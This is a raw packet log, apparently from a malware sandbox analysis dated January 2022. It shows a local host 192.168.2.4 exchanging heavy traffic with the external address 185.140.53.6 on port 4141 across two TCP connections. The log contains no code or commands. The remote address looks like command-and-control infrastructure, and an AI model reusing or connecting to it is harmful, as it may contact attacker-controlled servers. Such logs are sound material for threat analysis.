                        Jan 24, 2022 02:25:16.240536928 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.328032017 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.328150988 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.353262901 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.353316069 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.353358030 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.353468895 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.387641907 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.387805939 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.389153004 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.389210939 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.389297962 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.389353037 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.389367104 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.389411926 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.422200918 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.422303915 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.443613052 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.443752050 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.443794966 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.443830967 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.443897963 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.443979979 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.447313070 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.447355032 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.447431087 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.447489977 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.469228983 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.499596119 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.499831915 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.500128031 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.500320911 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.500327110 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.500405073 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.500695944 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.500741959 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.500775099 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.500813961 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.500817060 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.500881910 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.501390934 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.501467943 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.504134893 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.504216909 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.505913019 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.506016016 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.586946011 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.586985111 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.587011099 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.587038040 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.587218046 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.587302923 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.587382078 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.587529898 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.587541103 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.587696075 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.593528986 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.593578100 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.593715906 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.593759060 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.593792915 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.593842030 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.593863010 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.593914986 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.593961000 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.594002008 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.594316006 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.594377995 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.594458103 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.594532013 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.594707012 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.594784975 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.594785929 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.594857931 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.594858885 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.594949961 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.594989061 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.595057964 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.603975058 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.604006052 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.604110003 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.604209900 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.604271889 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.604393005 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.608417034 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.608490944 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.608521938 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.608588934 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.610074043 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.610146046 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.610165119 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.610238075 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.610271931 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.610348940 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.610368013 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.610451937 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.610510111 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.610577106 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.610614061 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.610688925 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.610728025 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.610794067 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.610862017 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.610929012 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.610932112 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.611001968 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.611058950 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.611124039 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.611259937 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.611325979 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.706837893 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.706897974 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.706935883 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.706974030 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.707012892 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.707098007 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.707166910 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.707199097 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.707251072 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.707293034 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.707334042 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.707376003 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.707423925 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.707539082 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.707576990 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.707617044 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.707694054 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.707803011 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.707897902 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.710249901 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.710350990 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.735421896 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.735450983 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.735471010 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.735589027 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.735596895 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.735702991 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.735815048 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.735836029 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.735893011 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.736056089 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.736131907 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.736159086 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.736294031 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.736314058 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.736368895 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.736371040 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.736447096 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.736499071 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.736569881 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.736634970 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.736705065 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.736771107 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.736857891 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.736926079 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.736991882 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.737000942 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.737063885 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.737118006 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.737184048 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.737250090 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.737315893 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.737349033 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.737421036 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.737487078 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.737556934 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.737611055 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.737682104 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.737683058 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.737757921 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.737874985 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.737896919 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.737948895 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.737970114 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.738044024 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.738054037 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.738130093 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.738332987 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.738665104 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.751033068 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.852727890 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.852777004 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.852811098 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.852842093 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.852859020 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.852893114 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.852902889 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.852938890 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.852960110 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.853035927 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.853099108 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.853231907 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.853291988 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.853378057 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.853410959 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.853439093 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.853462934 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.853585005 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.853646040 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.853661060 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.853718042 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.853758097 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.853813887 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.853914976 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.854006052 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.854202032 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.854262114 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.854262114 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.854321003 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.854382992 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.854440928 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.854465961 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.854521036 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.854547024 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.854604006 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.854665041 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.854723930 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.854783058 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.854846001 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.854909897 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.854967117 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.855133057 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.855194092 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.855253935 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.855310917 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.855839014 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.855926991 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.856232882 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.856292963 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.856515884 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.856576920 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.856607914 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.856647015 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.856662035 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.856709003 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.856806040 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.856897116 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.856952906 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.857055902 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.857112885 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.857173920 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.857229948 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.857290983 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.857346058 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.857407093 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.857460976 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.857625961 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.857683897 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.857736111 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.857791901 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.857831001 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.857920885 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.860486031 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.860851049 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.871479034 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.871520996 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.871540070 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.871587992 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.871612072 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.871669054 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.871725082 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.871907949 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.871968031 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.893668890 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.893739939 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.893824100 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.893898010 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.893938065 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.893954039 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.893979073 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:16.893994093 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:16.894037962 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:17.051717043 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:17.051750898 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:17.051773071 CET414149778185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:17.051913023 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:17.051975012 CET497784141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:20.956939936 CET497794141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:21.070646048 CET414149779185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:21.070823908 CET497794141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:21.071315050 CET497794141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:21.324995995 CET414149779185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:21.325154066 CET497794141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:21.649843931 CET414149779185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:21.650026083 CET497794141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:21.772528887 CET414149779185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:21.772641897 CET497794141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:22.092318058 CET414149779185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:22.092400074 CET497794141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:22.302000999 CET414149779185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:22.302045107 CET414149779185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:22.302114964 CET497794141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:22.302165031 CET497794141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:22.514771938 CET414149779185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:22.514833927 CET414149779185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:22.514869928 CET414149779185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:22.514909029 CET497794141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:22.514909983 CET414149779185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:22.514950037 CET497794141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:22.514974117 CET497794141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:22.684231043 CET414149779185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:22.684314966 CET414149779185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:22.684346914 CET414149779185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:22.684514046 CET497794141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:22.684535027 CET414149779185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:22.684603930 CET497794141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:22.757978916 CET414149779185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:22.758039951 CET414149779185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:22.758111954 CET497794141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:22.758136034 CET414149779185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:22.758208036 CET497794141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:22.758256912 CET414149779185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:22.758316994 CET497794141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:22.795356035 CET414149779185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:22.795387030 CET414149779185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:22.795404911 CET414149779185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:22.795419931 CET414149779185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:22.795435905 CET414149779185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:22.795494080 CET497794141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:22.795526028 CET497794141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:22.795773029 CET414149779185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:22.795790911 CET414149779185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:22.795824051 CET497794141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:22.795850039 CET497794141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:22.795861959 CET414149779185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:22.797287941 CET497794141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:22.885102987 CET414149779185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:22.885133982 CET414149779185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:22.885257959 CET414149779185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:22.885257006 CET497794141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:22.885298967 CET497794141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:22.885720968 CET414149779185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:22.885767937 CET497794141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:22.889265060 CET414149779185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:22.889322996 CET414149779185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:22.889338970 CET414149779185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:22.889386892 CET497794141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:22.889409065 CET497794141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:22.942476034 CET414149779185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:22.942508936 CET414149779185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:22.942625046 CET497794141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:22.943344116 CET414149779185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:22.949157000 CET497794141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:22.969651937 CET497794141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:23.078449011 CET414149779185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:23.078480005 CET414149779185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:23.078681946 CET414149779185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:23.078704119 CET414149779185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:23.078720093 CET497794141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:23.078825951 CET497794141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:23.078916073 CET414149779185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:23.078938007 CET414149779185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:23.078990936 CET497794141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:23.079319954 CET414149779185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:23.079341888 CET414149779185.140.53.6192.168.2.4
                        Jan 24, 2022 02:25:23.079370022 CET497794141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:25:23.079416990 CET497794141192.168.2.4185.140.53.6
